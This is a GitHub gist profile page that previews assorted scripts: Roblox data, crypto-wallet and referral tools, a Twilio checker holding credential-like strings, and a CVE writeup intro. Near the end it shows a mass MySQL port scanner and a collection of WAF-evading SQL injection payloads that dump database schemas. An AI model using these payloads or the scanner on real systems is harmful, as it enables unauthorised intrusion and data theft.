Skip to content

Instantly share code, notes, and snippets.

View im-hanzou's full-sized avatar
💭
I may be slow to respond.

Hanzou Urushihara im-hanzou

💭
I may be slow to respond.
View GitHub Profile
@im-hanzou
im-hanzou / README.md
Created May 28, 2025 11:38 — forked from mov-ebx/README.md
Roblox LocalizationService Countries + Flags

🌐 Roblox countries + flags

A LUA dictionary with every country code supported by Roblox's Localization Service, includes country's name and flag

The script is provided under this gist, however you can also use the require:

require(13144850866) -- returns dictionary

📜 Examples

function triggerClickEvent(target) {
const box = target.getBoundingClientRect();
const centerX = box.left + box.width / 2;
const centerY = box.top + box.height / 2;
['pointerdown', 'mousedown', 'mouseup', 'click'].forEach(eventType => {
const evt = new MouseEvent(eventType, {
bubbles: true,
cancelable: true,
clientX: centerX,
clientY: centerY,
@im-hanzou
im-hanzou / writeup.md
Created April 9, 2025 11:03 — forked from parrot409/writeup.md
CVE-2025-3155 writeup - Affecting Ubuntu distros

Details

Intro

CVE-2025-3155 affects Yelp which is The Gnome's user help application. It's installed by default on Ubuntu desktop.

what is a scheme

A URI scheme is the part of a Uniform Resource Identifier (URI) that identifies a protocol or a specific application (steam://run/1337) that should handle the resource identified by the URI. It's the part that comes before the colon (://).

# pip install colorama requests eth-account
import json
import time
import requests
from eth_account import Account
from eth_account.messages import encode_defunct
import secrets
from web3.auto import w3
import random
import sys
@im-hanzou
im-hanzou / teneo-claim-referral.py
Last active January 16, 2025 08:08
Teneo autoclaim referral rewards ( install modules: python -m pip install colorama requests )
import requests
from colorama import init, Fore, Style
import json
init()
def get_referrals(bearer_token):
url = 'https://api.teneo.pro/api/users/referrals'
headers = {
'Authorization': f'Bearer {bearer_token}',
@im-hanzou
im-hanzou / sol-privkey-uint8-to-base58.js
Created January 15, 2025 20:38
Convert solana uint8 privatekey to base58 privatekey
// npm install base58
// node sol-privkey-uint8-to-base58.js
import bs58 from 'bs58';
import readline from 'readline';
const rl = readline.createInterface({
input: process.stdin,
output: process.stdout
});
@im-hanzou
im-hanzou / balancechecker.js
Created August 25, 2024 16:03 — forked from nidhinkumar06/balancechecker.js
Twilio Balance Checker
function checkTwilioBalance() {
var options = {};
options.headers = {"Authorization": "Basic " + Utilities.base64Encode('AC123abc45678901c3ff481ea2' + ":" + 'baa9fe5ad79a7a97dxxx00c012a3d4ce')};
var url = 'https://api.twilio.com/2010-04-01/Accounts/AC123abc45678901c3ff481ea2/Balance.json';
var response = UrlFetchApp.fetch(url, options);
//parse JSON
var json = response.getContentText();
var data = JSON.parse(json);
@im-hanzou
im-hanzou / mysqlporter.py
Last active March 1, 2025 10:11
Mass Scan opened 3306 port using multiprocessing. Install library mysql (pip install mysql-connector-python colorama)
import mysql.connector
import multiprocessing
import re
from colorama import init, Fore
init(autoreset=True)
def check_mysql_port(host):
port = 3306
try:
@im-hanzou
im-hanzou / c9sdk-installer.sh
Last active August 23, 2024 19:20 — forked from ChristopherDosin/installc9.sh
Simple script to install Cloud9 on an Ubuntu Server
#!/bin/bash
# Simple script to install Cloud9 on an Ubuntu Server
apt-get update && apt-get install build-essential git nodejs npm python2 -y
curl -k https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py; python2 get-pip.py
git clone https://github.com/c9/core.git c9sdk
c9sdk/scripts/install-sdk.sh
#nodejs c9sdk/server.js -p 8080 -a -w ~~/your/directory/workspace
nodejs c9sdk/server.js -p 8080 -a user:pass
@im-hanzou
im-hanzou / dios-bypass-waf.txt
Created August 14, 2024 17:27 — forked from zetc0de/dios-bypass-waf.txt
DIOS (Dump In One Shoot) Collection bypass WAF
DIOS (Dump In One Shot) Collection
=======================================
concat_ws('<br>','zet',database(),version(),user(),@@hostname,(select(group_concat('<br>',table_name,':',column_name))from(information_schema.columns)where(table_Schema=database())))
(select%20(@x)%20from%20(select%20(@x:=0x00),(select%20(0)%20from%20(information_schema.schemata)%20where%20(0x00)%20in%20(@x:=concat(@x,0x3c62723e,schema_name))))x)
(select%20(@x)%20from%20(select%20(@x:=0x00),(select%20(0)%20from%20(information_schema.tables)%20where%20(table_schema=database())%20and%20(0x00)%20in%20(@x:=concat(@x,0x3c62723e,table_name))))x)